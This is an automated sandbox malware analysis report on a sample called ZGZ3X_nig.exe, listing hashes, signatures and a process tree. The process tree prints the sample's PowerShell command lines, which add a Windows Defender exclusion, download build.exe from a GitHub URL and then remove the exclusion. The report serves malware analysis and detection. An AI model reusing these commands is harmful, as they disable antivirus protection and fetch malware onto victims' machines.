Analysis

max time kernel:  119s
max time network: 120s
platform:         windows7_x64
resource:         win7-20250207-en
resource tags:    arch:x64, arch:x86, image:win7-20250207-en, locale:en-us, os:windows7-x64, system
submitted:        22/03/2025, 02:51
Behavioral task: behavioral1
  Sample:   ZGZ3X_nig.exe
  Resource: win7-20250207-en

Behavioral task: behavioral2
  Sample:   ZGZ3X_nig.exe
  Resource: win10v2004-20250314-en
General

Target: ZGZ3X_nig.exe
Size:   57KB
MD5:    16edd47bf01716b24958a0b3a3a7bcfb
SHA1:   8b7972f4190c2ca9d600084611e966fa0f899b98
SHA256: 568d485f89554f0a315d1f839e5e2b33c7735f9b3dc3892391bdaa16a3f480e8
SHA512: 9e6ca1cbfa194aff3aebb60fa7b73ee4ff63f9770cfe1d114b757d55693278ccb8f6a450235255a3ae03ac382b528b899eb973d571523fe12e3910b9568d38e1
SSDEEP: 768:d5qkvPJg++TldUQJbxc1knPItshRGibgFfYTrTQc1mRdJcWvFM79yipBvSrrCeao:3rPJVKjbcknWSOYvTfkWkFM79yQVFu/
Malware Config

Signatures

Command and Scripting Interpreter: PowerShell
  pid   Process
  2764  powershell.exe
  2928  powershell.exe

YARA rule matches
  resource                                                                      yara_rule
  behavioral1/memory/2184-0-0x0000000140000000-0x0000000140028000-memory.dmp    upx
  behavioral1/memory/2184-27-0x0000000140000000-0x0000000140028000-memory.dmp   upx

Hide Artifacts: Ignore Process Interrupts (1 TTPs, 2 IoCs)
  Command interpreters often include specific commands/flags that ignore errors and other hangups.
  pid   Process
  2928  powershell.exe
  2672  powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  2928  powershell.exe
  2764  powershell.exe
  2672  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description                 pid   Process
  Token: SeDebugPrivilege     2928  powershell.exe
  Token: SeDebugPrivilege     2764  powershell.exe
  Token: SeDebugPrivilege     2672  powershell.exe

Suspicious use of WriteProcessMemory (18 IoCs)
  description                    pid   Process         procid_target
  PID 2184 wrote to memory of 2784   2184  ZGZ3X_nig.exe   31
  PID 2184 wrote to memory of 2784   2184  ZGZ3X_nig.exe   31
  PID 2184 wrote to memory of 2784   2184  ZGZ3X_nig.exe   31
  PID 2784 wrote to memory of 2816   2784  cmd.exe         32
  PID 2784 wrote to memory of 2816   2784  cmd.exe         32
  PID 2784 wrote to memory of 2816   2784  cmd.exe         32
  PID 2816 wrote to memory of 2804   2816  net.exe         33
  PID 2816 wrote to memory of 2804   2816  net.exe         33
  PID 2816 wrote to memory of 2804   2816  net.exe         33
  PID 2784 wrote to memory of 2928   2784  cmd.exe         34
  PID 2784 wrote to memory of 2928   2784  cmd.exe         34
  PID 2784 wrote to memory of 2928   2784  cmd.exe         34
  PID 2784 wrote to memory of 2764   2784  cmd.exe         35
  PID 2784 wrote to memory of 2764   2784  cmd.exe         35
  PID 2784 wrote to memory of 2764   2784  cmd.exe         35
  PID 2784 wrote to memory of 2672   2784  cmd.exe         36
  PID 2784 wrote to memory of 2672   2784  cmd.exe         36
  PID 2784 wrote to memory of 2672   2784  cmd.exe         36
Processes (tree, depth shown by level number)

1. C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
   PID: 2184
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe
      command line: "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\6789.tmp\678A.tmp\678B.bat C:\Users\Admin\AppData\Local\Temp\ZGZ3X_nig.exe"
      PID: 2784
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\system32\net.exe
         command line: net session
         PID: 2816
         - Suspicious use of WriteProcessMemory

         4. C:\Windows\system32\net1.exe
            command line: C:\Windows\system32\net1 session
            PID: 2804

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2928
         - Command and Scripting Interpreter: PowerShell
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"
         PID: 2764
         - Command and Scripting Interpreter: PowerShell
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         command line: powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"
         PID: 2672
         - Hide Artifacts: Ignore Process Interrupts
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

(path not captured)
  Filesize: 2KB
  MD5:      1c935ef28fdfd394b770d945d7f04d76
  SHA1:     29e251c3c40ce4ad1b2984bf26b444aa045d9b21
  SHA256:   aa58e1df5882878a44687853f47d10b655c3fe888ec20fb99446305f5d38c681
  SHA512:   a9e60f2ac4aec15a3ba0a95df224449f64777a027357792247dd597529542e79128aec996c89ff86a1654911b4b763c577d3c3d2f38c59b02b280b8ad824e7e1

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5:      6753014d767e2b4a7aab6eb05a978b87
  SHA1:     913a5beb394a3d8944c32b417931a6a94d974cb5
  SHA256:   75162bf1827d9a8fa03f199d6a117f508837661bd1df2209c6b7339520ee9b28
  SHA512:   c8b5bf5151a9b2c5a7537d464e081964075c5f2360ecc2f47af3251949991104ffa2d1b0714bbae0d3139e8bd3835162bdde8d4aca04e53048ec920495595420